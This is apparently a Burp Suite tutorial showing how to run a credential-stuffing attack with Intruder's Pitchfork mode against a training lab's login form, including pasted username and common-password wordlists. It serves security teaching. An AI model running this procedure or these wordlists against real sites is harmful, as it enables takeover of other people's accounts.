PROFESSIONALCOMMUNITY

Credential stuffing using a Burp Intruder Pitchfork attack

  • Last updated: August 25, 2022

  • Read time: 4 Minutes

Burp Intruder provides a number of different attack types, which determine the way in which payloads are injected into the defined payload positions.

The Pitchfork attack type is useful in cases where an attack requires you to send specific combinations of payloads from different lists in the same request.

In this tutorial, you'll learn:

  • How a pitchfork attack works
  • How to configure a basic pitchfork attack with two sets of payloads
  • How to perform a credential stuffing attack

What is credential stuffing?

Credential stuffing is a form of brute-force attack in which an attacker attempts to log in to a site using a dictionary of known username:password pairs from one or more other sites. These sets of credentials are typically obtained via earlier data breaches.

Pitchfork attacks are ideal for this purpose because you can ensure that each username is sent with its matching password. As you can see from the example below, the first item from each payload list is sent together, then the second item from each list, and so on.

How the pitchfork attack type uses payloads

You'll perform an attack just like this in the following tutorial.

Note

Burp's browser is an easy way to proxy HTTP traffic - even over the encrypted HTTPS protocol. There is no setup required - simply go to the Proxy tab, click Open Browser, and ensure Intercept is off.

Step 1: Open the lab

Using Burp's browser, access the following lab:

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

Note

While this lab is not intended to demonstrate this attack, it does feature a simple login form that we can use as an example.

Step 2: Send a login request to Burp Intruder

In the lab, click the My account link to open the login page. Submit the login form using any arbitrary values.

Making a log in request using arbitrary values

In Burp Suite, go to the Proxy > HTTP history tab. Find the POST /login request and send it to Burp Intruder.

Step 3: Select the attack type

At the top of the Positions sub-tab, use the Attack type drop-down menu to select Pitchfork.

Changing the attack type to Pitchfork

Step 4: Configure the payload positions

Click on the Intruder tab and go to the sub-tab with your request in.

On the Intruder > Positions sub-tab. This shows the request, with § markers automatically inserted around everything Burp has identified as a potential insertion point. This may include things like cookies that you do not want to replace with a payload. Use the Clear § button to clear all of these.

In our example, we are only replacing the username and password.

Highlight the value of the username parameter and click Add §. Do the same for the password parameter.

Adding payload markers to a request

Step 5: Add the username payloads

Go to the Payloads sub-tab.

At the top of the tab is the Payload Sets option. This lets you alternate between different sets of payloads and configure them.

For a Pitchfork attack, you need to configure the same number payload sets as positions.

Select Payload set 1, then paste the list of candidate usernames into the Payload Options field.

Username list

carlos
root
admin
test
guest
info
adm
mysql
wiener
user
administrator
oracle
ftp
pi
puppet
ansible
ec2-user
vagrant
azureuser
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
administrator
administrators
admins
ads
adserver
adsl
ae
af
affiliate
affiliates
afiliados
ag
agenda
agent
ai
aix
ajax
ak
akamai
al
alabama
alaska
albuquerque
alerts
alpha
alterwind
am
amarillo
americas
an
anaheim
analyzer
announce
announcements
antivirus
ao
ap
apache
apollo
app
app01
app1
apple
application
applications
apps
appserver
aq
ar
archie
arcsight
argentina
arizona
arkansas
arlington
as
as400
asia
asterix
at
athena
atlanta
atlas
att
au
auction
austin
auth
auto
autodiscover
Pasting a payload set into Burp Intruder

Step 6: Add the password payloads

Select Payload set 2, then paste the list of candidate passwords into the Payload Options field.

Password list

123456
password
12345678
qwerty
123456789
12345
1234
111111
peter
1234567
dragon
123123
baseball
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
1234567890
michael
654321
superman
1qaz2wsx
7777777
121212
0
qazwsx
123qwe
killer
trustno1
jordan
jennifer
zxcvbnm
asdfgh
hunter
buster
soccer
harley
batman
andrew
tigger
sunshine
iloveyou
2000
charlie
robert
thomas
hockey
ranger
daniel
starwars
klaster
112233
george
computer
michelle
jessica
pepper
1111
zxcvbn
555555
11111111
131313
freedom
777777
pass
maggie
159753
aaaaaa
ginger
princess
joshua
cheese
amanda
summer
love
ashley
nicole
chelsea
biteme
matthew
access
yankees
987654321
dallas
austin
thunder
taylor
matrix
mobilemail
mom
monitor
monitoring
montana
moon
moscow
daniel

Step 7: Start the attack

Click Start Attack. A new Intruder attack window opens. Here, you can see the requests made by Intruder in real-time.

Step 8: Analyze the results

You can sort the results of the attack by any column, and apply filters by clicking the Filter bar. This can help you to spot differences between responses and patterns of results.

In our example, you can see that the combination of wiener and peter is the only one to return a 302 status code.

Analyzing the attack results

If you examine the response to this login, you can see that the server sent a new session cookie. This could indicate that the login was successful.

Note

Subsequent login attempts receive a 400 error response because the original CSRF token included in each request doesn't correspond to the new session ID.

In addition to sorting the results, you can also configure Grep settings on the Options tab to flag results that match a pattern of text or extract text that matches a pattern.

Step 9: Confirm your results

In the browser, go back to the login page and log in using the credentials wiener:peter to confirm that you have successfully identified a valid set of login credentials.

Summary

Congratulations, you have learned to configure pitchfork attacks and to use the Intruder Attack window to analyze the results.

What next?

In the wild, you may encounter additional defences, such as rate limiting, which make attacks like this more difficult. Why not check out the rest of our authentication-based materials on the Web Security Academy to learn more?

Was this article helpful?